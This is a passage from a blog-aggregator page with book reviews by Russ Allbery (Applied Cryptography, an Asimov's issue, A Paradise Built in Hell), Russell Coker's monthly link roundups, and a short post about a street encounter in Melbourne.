with cryptography. But this is the place to start, and I wholeheartedly recommend Cryptography Engineering to anyone working in computer security. Whether you're writing code, designing systems, or even evaluating products, this is a very useful book to read. It's a comprehensive introduction if you don't know anything about the field, but deep enough that I still got quite a bit of new information from it despite having written security software for years and having already read Applied Cryptography. Highly recommended. I will probably read it from cover to cover a second time when I have some free moments. Rating: 9 out of 10

30 November 2013

Russell Coker: Links November 2013

Shanley wrote an insightful article about microagressions and management [1]. It s interesting to read that and think of past work experiences, even the best managers do it. Bill Stone gave an inspiring TED talk about exploring huge caves, autonamous probes to explore underground lakes (which can be used on Europa) and building a refuelling station on the Moon [2]. Simon Lewis gave an interesting TED talk about consciousness and the technology needed to help him recover from injuries sustained in a serious car crash [3]. Paul Wayper wrote an interesting article about reforming the patent system [4]. He also notes that the patent system is claimed to be protecting the mythical home inventor when it s really about patent trolls (and ex-inventors who work for them). This is similar to the way that ex-musicians work for organisations that promote extreme copyright legislation. Amanda Palmer gave an interesting TED talk about asking for donations/assistance, and the interactions between musicians and the audience [5]. Some part of this are NSFW. Hans Rakers wrote a useful post about how to solve a Dovecot problem with too many files open [6]. His solution was for a Red Hat based system, for Debian you can do the same but by editing /etc/init.d/dovecot. The use of the /proc/N/limits file was interesting, I ve never had a cause to deliberately use that file before. Krebs on Security has an interesting article about Android malware being used to defeat SMS systems to prevent bank fraud [7]. Apparently an infected PC will instruct the user to install an Android app to complete the process. Rick Falkvinge wrote an interesting article about how to apply basic economics terminology to so-called Intellectual Property [8]. Matthew Garrett wrote an interesting post about the way that Ubuntu gets a better result than Debian and Fedora because it has clear fixed goals [9]. He states that many people regard Fedora as a playground to produce a range of niche derivatives , probably a large portion of the Fedora and Debian developers consider this a feature not a bug. Ming Thein wrote an interesting article about the demise of the DSLR [10]. Bruce Schneier wrote an interesting post on the detention of David Miranda by the British authorities [11]. It s mostly speculation as to why they would do such a thing (which seems to go against their own best interests) and whether the NSA even knows which documents Edward Snowden copied. Jaclyn Friedman wrote an interesting article on Mens Rights Movements (MRAs) and how they are bad for MEN as well as for women [12]. Rodney S. Tucker wrote an insightful article for the IEEE about the NBN [13]. Basically the Liberal party are going to spend most of the tax money needed for a full NBN but get a significantly less than the full benefit. Lauren Drell wrote an interesting article for Mashable about TellSpec, a portable spectrometer that communicates with an Android phone to analyse food for allergens [14]. I guess this will stop schools from banning phones. Katie McDonough wrote an interesting article for Salon about the Pope s statements about the problems with unchecked capitalism [15]. His ideas are really nothing new to anyone who has read the Bible and read the news. It seems to me that the most newsworthy part of this is that most Christian leaders don t make similar statements. Daniel Leidert wrote an interesting post about power saving when running Debian on a HP Microserver [16]. Most of it is relevant to other AMD64 hardware too, I ll have to investigate the PCIE ASPM and spin down options on some of my systems that are mostly idle.

24 October 2013

Russ Allbery: Review: Applied Cryptography

Review: Applied Cryptography, by Bruce Schneier
Publisher: John Wiley & Sons
Copyright: 1996
ISBN: 0-471-11709-9
Format: Trade paperback
Pages: 621
This is the next entry in the series of Russ reading books that he bought years ago and never got around to reading. Thankfully, this time, the book has aged somewhat better. This review is for the second edition of Applied Cryptography, published in 1996. Given how important computer security has become, and how central cryptography is to computer security, one might think that the passage of 17 years would make a book effectively obsolete. This turns out not to be the case. Yes, Rijndael (the current AES standard and the most widely-used block cipher), Camellia (the up-and-comer in the block cipher world), and the SHA-2 hash postdate this book and aren't discussed. Yes, there have been some further developments in elliptic-curve public-key cryptography. And yes, much of the political information in this book, as well as the patent situation for public-key cryptosystems, is now mostly of historical interest. But a surprising amount of this book still applies directly. Partly that's because much of Applied Cryptography is focused on general principles, classes of algorithms, and cryptographic protocols, and those do not change quickly. A rather amazing number of techniques and protocols still in widespread use today originated in the 1970s. Block ciphers, stream ciphers, cipher modes, public-key systems, signature systems, hash functions, key exchange, secret splitting, key management, and other, similar topics have not changed substantially. And even in the area of specific algorithms, DES is still in use (unfortunately) and its analysis is valuable for understanding any block cipher. RC4, Triple DES, CAST, RSA, MD4, MD5, and SHA-1 are still part of the cryptography landscape, and Schneier was already warning against using MD5 in 1996. The source code included in this book has, thankfully, been made obsolete by widely-available, high-quality free implementations of all common ciphers, available for any modern operating system. But the math, the explanations, and much of the cryptanalysis is still quite relevant. While it contains a comprehensive introduction to cryptographic concepts, Applied Cryptography is structured more like a reference manual than a tutorial. The first two chapters provide some foundations. Then, a wide variety of protocols, from the common to the completely esoteric, are discussed across the subsequent four chapters. There are four chapters on the basics of ciphers, another chapter on the mathematics, and then the longest part of the book: twelve chapters that provide a tour of all major and several interesting minor protocols that existed in 1996. These are organized into block ciphers, stream ciphers (and pseudo-random number generators), hash functions, and public-key systems. An entire chapter is devoted to the history and analysis of DES, and I think that was my favorite chapter of the book. Not only is it worth understanding how DES works, but it also provides a comprehensive introduction to the complexities of block cipher design, the politics of interactions with the NSA, and a fascinating history of early computer cryptosystems. Finally, Applied Cryptography closes with chapters on real-world systems and on politics. The politics section is mostly a historical curiosity, as is much of the chapter on real-world systems. Schneier discusses some of the PKCS and X.509 protocols here but doesn't use SSL as one of his examples despite its specification predating this book (perhaps the most glaring omission of the book). But he does discuss Kerberos (which is of personal interest to me), and it was useful to see it analyzed in the broader context of this sort of book. Those who read Schneier's blog regularly, or who have read any of his other books, will know that he's concise, incisive, and very readable, even with difficult material. I think he does err on the side of compactness this is not a book that handholds the reader or explains something more than once but there's a lot of ground to cover, so I can't really blame him. Expect to have to read the more difficult parts several times, and (at least on a first read) expect to just skip past some of the most complex sections as probably not worth the effort. But I think Schneier does a great job structuring the book so that one comes away with a high-level impression and overview sufficient to make informed guesses about capabilities and relative difficulty even if one doesn't have the patience to work through the details. I suspect most readers will want to skim at least part of this book. Unless you're willing to do a lot of background reading to understand the math, or a lot of careful study to follow the detailed descriptions and flaws in often-obscure algorithms, the algorithm discussions start to blend together. I found myself skipping a lot of the math and focusing on the basic descriptions and the cryptanalysis, particularly for the obscure ciphers. Many of the algorithms are also highly opaque and of obscure benefit; I doubt I will ever care about blind signatures or oblivious transfer, and I struggled to wrap my mind around the details of bit commitment (although it's apparently important in zero knowledge proofs, which in turn are relevant to authentication). But this is not the sort of book where you have to read every word. It's very well-structured, provides clear resynchronization points for readers who have had enough of a particular topic, and marks the topics that are more obscure or of dubious general usefulness. The most useful parts of this book, in my opinion, are the basic conceptual introductions to each class of cryptographic algorithm or protocol, and those chapters are excellent. I've been working in applied computer security, at the application and deployment level, for years, and this is the first time that I've felt like I really understood the difference between a block cipher and a stream cipher, or the implications of block cipher mode selection. Applied Cryptography is also a fascinating exercise in adjusting one's intuition for where the complexity lies. It's a memorable experience to move from the chapters on block ciphers, full of S-boxes and complex mixing and magic numbers, into the far more straightforward mathematical analysis of stream ciphers. Or the mathematical simplicity of RSA (although quite a bit of complexity is lurking on the cryptanalysis side, much of which is only touched on here). Of more historical interest, but still quite impressive, is that Applied Cryptography doubles as a comprehensive literature review. Not only does it cover nearly every algorithm in use at the time, it discusses the cryptography literature on nearly every topic with brief summaries of results and lines of investigation. The references section is a stunning 66 pages of small print featuring 1,653 references, and those are mentioned and put in context throughout the book. I'm not personally interested in chasing those lines of research further, and of course 17 years means there are many new papers that are as important to read today, but it's obvious that this book would have been an amazing and invaluable map to the research territory when it was first published. There are now newer books on this topic that you should consider if you're purchasing a book today. Cryptography Engineering in particular is in my to-read pile, and I'm interested to see how much of this book it could replace, although I believe it's lighter on the mathematical analysis and details. But I think Applied Cryptography still has a place on the bookshelf of any computer security professional. Schneier is succinct, detailed, straightforward, and comprehensive, at least for 1996, and I know I'll be reaching for this book the next time I forget the details of CFB mode and then get hopelessly confused by the Wikipedia article on the topic. Rating: 8 out of 10

28 May 2013

Russell Coker: Links May 2013

Cameron Russell (who works as an underwear model) gave an interesting TED talk about beauty [1]. Ben Goldacre gave an interesting and energetic TED talk about bad science in medicine [2]. A lot of the material is aimed at non-experts, so this is a good talk to forward to your less scientific friends. Lev wrote a useful description of how to disable JavaScript from one site without disabling it from all sites which was inspired by Snopes [3]. This may be useful some time. Russ Allbery wrote an interesting post about work and success titled The Why? of Work [4]. Russ makes lots of good points and I m not going to summarise them (read the article, it s worth it). There is one point I disagree with, he says You are probably not going to change the world . The fact is that I ve observed Russ changing the world, he doesn t appear to have done anything that will get him an entry in a history book but he s done a lot of good work in Debian (a project that IS changing the world) and his insightful blog posts and comments on mailing lists influence many people. I believe that most people should think of changing the world as a group project where they are likely to be one of thousands or millions who are involved, then you can be part of changing the world every day. James Morrison wrote an insightful blog post about what he calls Penance driven development [5]. The basic concept of doing something good to make up for something you did which has a bad result (even if the bad result was inadvertent) is probably something that most people do to some extent, but formalising it in the context of software development work is a cencept I haven t seen described before. A 9yo boy named Caine created his own games arcade out of cardboard, when the filmmaker Nirvan Mullick saw it he created a short movie about it and promoted a flash mob event to play games at the arcade [6]. They also created the Imagination Foundation to encourage kids to create things from cardboard [7]. Tanguy Ortolo describes how to use the UDF filesystem instead of FAT for USB devices [8]. This allows you to create files larger than 2G while still allowing the device to be used on Windows systems. I ll keep using BTRFS for most of my USB sticks though. Bruce Schneier gave an informative TED talk about security models [9]. Probably most people who read my blog already have a good knowledge of most of the topics he covers. I think that the best use of this video is to educate less technical people you know. Blaine Harden gave an informative and disturbing TED talk about the concentration camps in North Korea [10]. At the end he points out the difficult task of helping people recover from their totalitarian government that will follow the fall of North Korea. Bruce Schneier has an interesting blog post about the use of a motherboard BMC controller (IPMI and similar) to compromise a server [11]. Also some business class desktop systems and laptops have similar functionality. Russ Allbery wrote an insightful article about the failures of consensus decision-making [12]. He compares the Wikipedia and Debian methods so his article is also informative for people who are interested in learning about those projects. The TED blog has a useful reference article with 10 places anyone can learn to code [13]. Racialicious has an interesting article about the people who take offense when it s pointed out that they have offended someone else [14]. Nick Selby wrote an interesting article criticising the Symantic response to the NYT getting hacked and also criticises anti-viru software in general [15]. He raises the point that most of us already know, anti-virus software doesn t do much good. Securing Windows networks is a losing game. Joshua Brindle wrote an interesting blog post about security on mobile phones and the attempts to use hypervisors for separating data of different levels [16]. He gives lots of useful background information about how to design and implement phone based systems.

16 May 2013

Russ Allbery: Review: Asimov's, July 2011

Review: Asimov's Science Fiction, July 2011
Editor: Sheila Williams
Issue: Volume 35, No. 7
ISSN: 1065-2698
Pages: 112
Williams's editorial is a mildly interesting piece about story titles. Silverberg's column is a more interesting (and rather convincing) rebuttal of the joke that fiction authors are "professional liars," combined with an examination of a fake and fantastic 14th travelogue that (at least in Silverberg's telling) was widely believed at the time. The precis of Silverberg's argument is that lying requires an intent to deceive, which is a property of deceptive memoir writers but not of fiction authors. Di Filippo's review column, as usual, is devoted almost entirely to esoterica, although I was moderately interested to hear of Stableford's continued work on translating early French SF. None of it seems compelling enough to go buy, but good translations of early works seem like a good thing to have in the world. "Day 29" by Chris Beckett: The conceit of this novelette is an interstellar travel system akin to a transporter that allows near-instantaneous travel between worlds. The drawback is that all memories from somewhere between 40 and 29 days before transit up until transit are wiped. The progatonist is a data analyst who is about to travel, and therefore by agency rule is required to stop doing work on day 40 before transmission since he can't be held legally liable for anything he has no recollection of doing. (I would like to say that I find this implausible, since one could always keep records, but it's exactly the sort of ass-covering regulation that a human resources department would come up with.) The premise is quite interesting: what do you do during that period that you're going to forget? Beckett wisely mixes Stephen's current waiting period on the colony world with his diary of his original waiting period on Earth the first time he went through the transmission process, and the latter adds greatly to the reader's appreciation of the weirdness of the forgotten interval. Unfortunately, this is a story more about psychological exploration than about plot, and Stephen just isn't very interesting. The telepathic but possibly nonsentient aliens add weirdness but not much else, and the ending of the story provided little sense of closure or conclusion for me. A good idea, but not the execution I wanted. (5) "Pug" by Theodora Goss: Since I grew up with a pug, I have a soft spot for a story featuring one; sadly, though, this story has insufficient pug in it. This is a quiet fantasy (Asimov's calls it SF, presumably on the basis of parallel worlds and a hypothesized scientific explanation, but it reads like fantasy to me) featuring Victorian girls, including one with a bad heart. They discover a hidden door to other versions of their world and do some minor exploration. There's little or nothing in the way of plot; the story is more of an attempt to capture a mood. It's mildly diverting, but I wish it had gone somewhere more substantial. (5) "Dunyon" by Kristine Kathryn Rusch: A Rusch story is often the highlight of an issue, and this is no exception. The protagonist is the owner of a bar in a space station that's become a combination of a refugee camp and a slum. War and chaos have created desperate people, most of whom are attempting to find some way to resources and get out of the bottom of society. The story is about a rumor: a mythical system named Dunyon that's safe and far away. And it's about how people react to that rumor. There's nothing particularly surprising about the direction the story goes (it's fairly short), but Rusch is always a good storyteller. (7) "The Music of the Sphere" by Norman Spinrad: I've had mixed feelings about Spinrad's fiction (and some of his essays), but I liked this story, despite its implausibility. It's set in the near future, featuring an expert in cetaceans and dolphin perception and a composer obsessed with both loud music and classical musical style. Just from that description, you can probably predict much of the story, but I thought it had some neat ideas about dolphins, whales, and alternate perception and aesthetics. (Note: neat, not necessarily biologically plausible.) Enjoyable. (6) "Bring on the Rain" by Josh Roseman: In a change of pace from the rest of the issue, this is a post-apocalyptic story of caravans of wheeled ships traversing a scorched and ruined landscape in search of weather systems and rain. The feel is of an inverted Waterworld, but with more emphasis on military tactics and cooperating fleets. The transposition of fleet maneuvers to huge ground vehicles adds some extra fun. The plot has little to do with the background and is a fairly stock military adventure scenario, but it's reasonably well-told. The story feels like an excerpt from a larger military-SF-inspired adventure, but the length keeps the quantity of tactics and maneuvering below the threshold where I would get bored. (6) "Twelvers" by Leah Cypess: This is a sharp and occasionally mean story of adolescent cruelty and alienation. Darla is a "twelver," a child who was carried an extra three months in the womb using newly-invented medical technology because of a belief in the advantages this would bring in later life. Unfortunately for all those who used this technique, what it also brought was a preternatural calm and an unusual reaction to emotions. Darla finds it almost impossible to get upset at anything, and that, of course, prompts the cruelty and abuse of other children. Most of the story is a description of that abuse, leading up to Darla stumbling into a nasty solution to her immediate problem. It's all very believable (well, apart from the motivating biology), but I didn't enjoy reading about it, and I'm certainly not convinced that the ending will lead to anything good. (5) "The Messenger" by Bruce McAllister: This is a very short time travel story, where time travel is used to try to unwind old family pain. This world follows the unalterable history model: no changes to the past are possible, and anything you do in the past has already happened. The mechanics are mostly avoided. Instead, McAllister concentrates on his mother, his father, and their complex relationship. I would have needed a bit more background on the characters to care enough about them for the story to be fully effective, but while the heartstring-pulling is kind of obvious, it's still a solid story. (6) "The Copenhagen Interpretation" by Paul Cornell: This is the most ingenious of the stories in this issue. It's set in a future world that extends what seemed to me to be pre-World-War-I great power politics, although there may be a hint of the Cold War. Great nations have reached a careful balance of power, and spies and secret services work to sustain that balance. The progatonist is one of those agents, making use of advanced technology like space folds in the service of a cause that he doesn't entirely believe in. Cornell mixes in mental conditioning, artificial people, space travel, and even aliens (maybe) in a taut thriller plot that, for me, gained a great deal from the unexplained strangeness of its background. If you like diving into the deep end and following a fast-moving plot against a background of strangeness, this is the sort of SF you'll enjoy. (7) Rating: 6 out of 10

23 February 2013

Russell Coker: Serious Begging

This evening I was driving through one of the inner suburbs of Melbourne when a man flagged me down. He said that his mother was dying and he needed a taxi ride to some hospital far away and needed to borrow $200. He was saying something about his phone, I wasn t sure if he was planning to give me his phone number so I could call him to ask for repayment or offering his phone as collateral on the loan (incidentally a well known scam is to offer a stolen phone as collateral for a loan, it s a way of selling a locked phone that doesn t have cables). I ve encountered many beggars over the years, but he was by far the most serious about it he demonstrated the level of desperation that I ve only previously seen documented in history books and reports from travelers who visited developing countries. I will never know if his mother was dying, there are lots of other reasons why someone might urgently need cash (most of which won t get much sympathy). I gave him $20 as a gift. If his story was legitimate then I gave him 10% of what he needed so he only had to find another 9 people willing to do the same. If he was lying then I can afford to lose $20. In any case I definitely wasn t going to do what he asked and withdraw hundreds of dollars from an ATM for him. Also regardless of whether he was telling the truth I didn t want to have him repay me, if he s telling the truth then I m happy to give money to him and if he s not then I m better off avoiding him in future. If I had $50 I would probably have given it to him, but $200 is too much. As I drove off I looked in my rear-vision mirror and saw him running between cars on the road trying to flag someone else down. Running through moving traffic on a Saturday night is another indication of how serious he was, generally someone who s in a good state of mind and wants a long and healthy life won t do that.

25 December 2012

Russ Allbery: Review: A Paradise Built in Hell

Review: A Paradise Built in Hell, by Rebecca Solnit
Publisher: Penguin
Copyright: 2009
Printing: 2010
ISBN: 0-14-311807-2
Format: Trade paperback
Pages: 319
A Paradise Built in Hell is a book with an agenda. Solnit's goal is to convince the reader that nearly everything we're shown in movies and popular culture about human behavior during disasters is wrong. Not only is destructive mass panic unusual verging on nonexistent, spontaneous cooperation and acts of startling courage and resourcefulness are commonplace. The heroes that we hear about afterwards are more the norm than the exception. Disasters are far more likely to bring out the best in people than the worst. They break down barriers and form spontaneous human communities that survivors remember for a lifetime. Rather than natural disasters leading inevitably to an exacerbating human crisis in the absence of strong authority, Solnit argues that they are an amazing human opportunity, and that the most negative and destructive human behavior during crises is not from untrained victims but from the panic of the elites who are supposedly responsible for protecting the public. I think her analysis and presentation is both deeply appealing and deeply flawed. The flaws involve extrapolation and generalization beyond the applicability of her research, and I'll say more about that in a moment. But the appeal is still surprising and satisfying, and I think there's a lot of truth in this book despite its one-sided presentation. I like to tell people, half-jokingly, that I'm an anarchosyndicalist. It's my political alliegance of the heart: the political structure that I know would never work, but that matches the world I want to live in. (I suspect much of the belief in libertarianism is of this form.) Now I have a book to point people at when they ask what the appeal of anarchosyndicalism is. The sense of spontaneous community, of bonding, of reaching out to other people to do something necessary, together, that Solnit describes here in the aftermath of a disaster matches that vision of a world without imposed economic authority, where people spontaneously collaborate to solve problems. A Paradise Built in Hell is structured by disaster, providing a tour of major disasters and their aftermath interspersed with extended musings on what the human reactions mean and how disaster communities functioned. The major disasters discussed are the 1906 San Francisco earthquake, the Halifax explosion, the 1985 Mexico City earthquake, 9/11, and Hurricane Katrina. Solnit moves through them in chronological order, closing the book with Katrina, which had (at least for me) the most infuriating and uplifting mixes of community bonding and elite panic. But both of those factors are present from the beginning in the 1906 earthquake: spontaneous human organization that (from multiple first-hand accounts) transformed people's lives mixed with a military reaction and elite panic that possibly did more damage to the city than the earthquake did. Elite panic is the dark side of Solnit's celebration of human altruism and spontaneous community organization. The primary picture she paints is of ordinary people responding with great courage and creativity and finding, in their reaction, a transformative experience and a sense of purpose that often becomes the most powerful and positive experience of their life. But this is at odds with a deeply-entrenched elite belief in mass panic, in the necessity of keeping information from the public to suppress their reaction, and in the need to re-establish "order." And with that, Solnit is absolutely scathing, and with some justification. Along with detailed accounts of these major disasters, Solnit also gives the reader a tour of the research literature on disasters, research that has shown that the panic and chaos that is at the center of practically every disaster movie ever made is essentially a myth. Mass panic in disasters is not only rare, it's close to non-existent. As you might expect, the handling of Katrina by both the government and by neighboring white communities is the subject of the harshest attacks. The material on Katrina presented here is enough to make anyone want to throw out the current playbook on how we react to disasters (and lest one think Solnit is unfair, her research matches very closely with other research and journalism on Katrina that I've seen from a wide variety of sources). But Solnit shows that this is a pattern: the combination of our media-driven belief in how people will react to disasters combined with the elite need to re-establish control plays out in many major disasters, and almost always negatively. Even in 9/11, the official response in some cases hampered and undermined an already-effective unofficial response. This is very interesting and has concrete implications for public policy around disasters. But where Solnit moves onto thinner anarchosyndicalist ice is the story that she tells about disasters as dramatic upheavals of the established social order that could point to a revolution in how we interact with each other. Solnit is deeply inspired by human altruism during disasters, and her enthusiasm is somewhat contageous, but it was useful to read this book shortly after Bruce Schneier's Liars and Outliers. I think Solnit, in her understandable eagerness to find a way to extend disaster behavior to general life, does not understand the relationships between what Schneier terms moral, reputational, and institutional pressures. And that's the core of why we need to both enable spontaneous human response in disasters and have organized first responders and supporting infrastructure, and why disaster communities will break down when extended beyond the disaster. When I first mentioned A Paradise Built in Hell to my mother, her first reaction was dubiousness due to her memory of the 1977 New York City blackout. There was a disaster that resulted in widespread looting and destruction, rather than the positive reaction Solnit describes. Solnit does have a cogent argument for why looting is poorly analyzed (we don't, for example, distinguish between breaking into stores to get desperately needed supplies and doing so for personal gain) and should not be a priority in a life-threatening disaster. But it's not completely convincing; in some disasters, particularly ones like the 1977 power outage that were not particularly life-threatening, the looting has been the most destructive part of the disaster. Schneier provides what I think is the missing piece, both to this and to why the wonderful behavior during disasters doesn't last into everyday life. During a life-threatening disaster, moral pressures are massively increased. Nearly all of us have self-images and moral beliefs that provide very strong incentives to help others and collaborate in the face of life-threatening emergencies, incentives that override other motives and lead to the sort of behavior that Solnit celebrates. But moral pressures have inherent limitations. That moral reaction applies most strongly to small groups (such as bands of survivors), and will start to break down as larger society re-establishes itself. And disasters, like a power outage, that are not immediately life-threatening will not provoke the same intensification of moral pressures: we don't have strong moral beliefs and internal stories about staying quietly at home during power outages the way that we do for saving people from burning buildings or pulling them out of rubble. Once larger communities have reformed and that short-term emergency reaction has dissipated, the need for institutional pressures (police, law, and formal authority structures) will return. I wish Solnit had been able to read Schneier's book before writing hers. I think his analysis structure provides a healthy dose of realism and perspective to her desire for a self-organizing communal world, and might have blunted her enthusiastic but somewhat unrealistic hopes for finding some key to a revolution in human organization in the heart of disasters. But if A Paradise Built in Hell is unlikely to lead to a radical change in how we organize societies, it should at least provoke a radical rethinking of some of our unnecessary pessimism about our fellow humans. The evidence is substantial and compelling: crisis brings out the best in people, not the worst, and the ordinary people who happen to be around are capable of becoming some of the most amazing disaster response teams that we can imagine. This has numerous mundane implications for social policy. We should consider simple training for the general public, for example, to strengthen that reaction, should allow for it in legal structures and training of first responders (around looting, for instance), and should do everything we can to kill the destructive myth that people cannot be trusted in disasters or that mass panic will be as much of a threat as the disaster. But the best part of this book is that it provides a concrete, well-documented, and well-defended reason to let go of some of our cynicism and to extend a bit of trust to our fellow humans. There sadly aren't earth-shaking implications for everyday society, but there is a wealth of evidence that shows that we're better people in the crunch than we believe we are, or that we expect of others. And the more that we can embrace the dissolution of boundaries and social hierarchies in the middle of disasters, the more we are likely to be surprised by deep human connection and a sense of shared, focused purpose. Solnit is a bit long-winded with her agenda, but that bright hope has stuck with me. Recommended. Rating: 8 out of 10

Next.

Previous.